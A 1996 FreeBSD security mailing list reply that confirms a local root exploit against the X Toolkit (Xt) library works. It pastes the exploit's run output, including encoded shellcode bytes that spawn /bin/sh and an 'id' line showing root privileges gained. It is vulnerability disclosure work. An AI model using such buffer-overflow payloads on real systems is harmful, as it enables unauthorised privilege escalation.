From owner-freebsd-security  Sun Aug 25 13:30:06 1996
Return-Path: owner-security
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.5/8.7.3) id NAA03711
          for security-outgoing; Sun, 25 Aug 1996 13:30:06 -0700 (PDT)
Received: from who.cdrom.com (who.cdrom.com [204.216.27.3])
          by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA03660;
          Sun, 25 Aug 1996 13:29:58 -0700 (PDT)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253])
          by who.cdrom.com (8.7.5/8.6.11) with ESMTP id EAA24393
          ; Sun, 25 Aug 1996 04:51:25 -0700 (PDT)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id NAA08752; Sun, 25 Aug 1996 13:50:37 +0200
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id NAA06463; Sun, 25 Aug 1996 13:50:24 +0200
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.7/keltia-uucp-2.9) id NAA25686; Sun, 25 Aug 1996 13:48:21 +0200 (MET DST)
Message-Id: <199608251148.NAA25686@keltia.freenix.fr>
Date: Sun, 25 Aug 1996 13:48:21 +0200
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@FreeBSD.ORG
Cc: security-officer@FreeBSD.ORG
Subject: Re: Vulnerability in the Xt library (fwd)
In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500
References: 	<199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
X-Mailer: Mutt 0.41
Mime-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature";
	micalg=pgp-md5; boundary=Tkw3iuTSQTdrZTDt
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk


--Tkw3iuTSQTdrZTDt
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

According to Kent Hamilton:
> Thought this might be of interest.

I confirm that it works like a charm here :-(
=20
357 [13:44] roberto@keltia:~/src/C> ./exploit=20
Using offset of esp + 0 (efbfd3b0)
Buffer size 1491
Warning: Color name "=EB#^^
                         1=D2VVVV1=C0=B0;N
                                    =CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=
=BF=EF=B4=D3=BF=EF=EB#^^
                                                                  1=D2VVVV1=
=C0=B0;N
                                                                           =
  =CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=BF=EF=B4=D3=BFH=B3=BF=EF!
# id
uid=3D101(roberto) euid=3D0(root) gid=3D10(staff) groups=3D10(staff), 0(whe=
el), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list)=
, 100(copains), 117(dialer), 2000(dos), 2001(tex)

I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I
recall.

--=20
Ollivier ROBERT    -=3D- The daemon is FREE! -=3D-    roberto@keltia.freeni=
x.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996

--Tkw3iuTSQTdrZTDt
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia

iQCVAwUBMiA9gwDy2QnruxtBAQGybgP/SFbjUahCvBxn2C7SR8irUwKquF6mOdcS
Z4skE4JF8m1Lf86Nn9ixxs0WIpVtLMQcP5AcijkiMQGPHhwBgRTqPJcTOufkfpP0
9y1iKxWMnB4zxgxpJbT1DHOVhrKRqbbn1xHO/W+i6eH6WHrLRKyCC1j7k1YZBLL4
YQr0Z9n5Bo4=
=sX2i
-----END PGP SIGNATURE-----

--Tkw3iuTSQTdrZTDt--